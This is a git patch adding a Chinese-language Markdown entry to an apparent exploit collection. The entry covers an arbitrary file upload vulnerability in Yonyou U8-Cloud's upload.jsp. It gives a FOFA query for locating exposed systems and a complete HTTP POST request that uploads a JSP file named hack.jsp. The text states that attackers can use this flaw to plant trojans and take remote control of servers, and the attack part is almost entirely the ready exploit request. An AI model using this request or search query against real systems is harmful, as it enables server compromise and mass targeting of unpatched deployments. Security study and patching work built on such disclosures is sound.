From 61aee42d2f7d6cc15113ac526ad648844559e7be Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 25 Oct 2023 19:46:29 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BU8-Cloud=20upload?=
 =?UTF-8?q?=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 用友U8-Cloud upload任意文件上传漏洞.md | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 用友U8-Cloud upload任意文件上传漏洞.md

diff --git a/用友U8-Cloud upload任意文件上传漏洞.md b/用友U8-Cloud upload任意文件上传漏洞.md
new file mode 100644
index 0000000..6adf2e7
--- /dev/null
+++ b/用友U8-Cloud upload任意文件上传漏洞.md	
@@ -0,0 +1,24 @@
+
+## 用友U8-Cloud upload任意文件上传漏洞
+该系统upload.jsp存在任意文件上传漏洞，攻击者可通过该漏洞上传木马，远程控制服务器
+
+## fofa
+```app="用友-U8-Cloud"```
+
+## exp
+```
+POST /linux/pages/upload.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0
+Connection: close
+Content-Length: 31
+Content-Type: application/x-www-form-urlencoded
+filename: hack.jsp
+Accept-Encoding: gzip
+
+<% out.println("The website has vulnerabilities!!");%>
+```
+## 漏洞复现
+![](https://img-blog.csdnimg.cn/img_convert/4e222417f164a3b33772bf18041feb82.png)
+
+![](https://img-blog.csdnimg.cn/img_convert/d68273de84c541f1cb5a0ac52b469b98.png)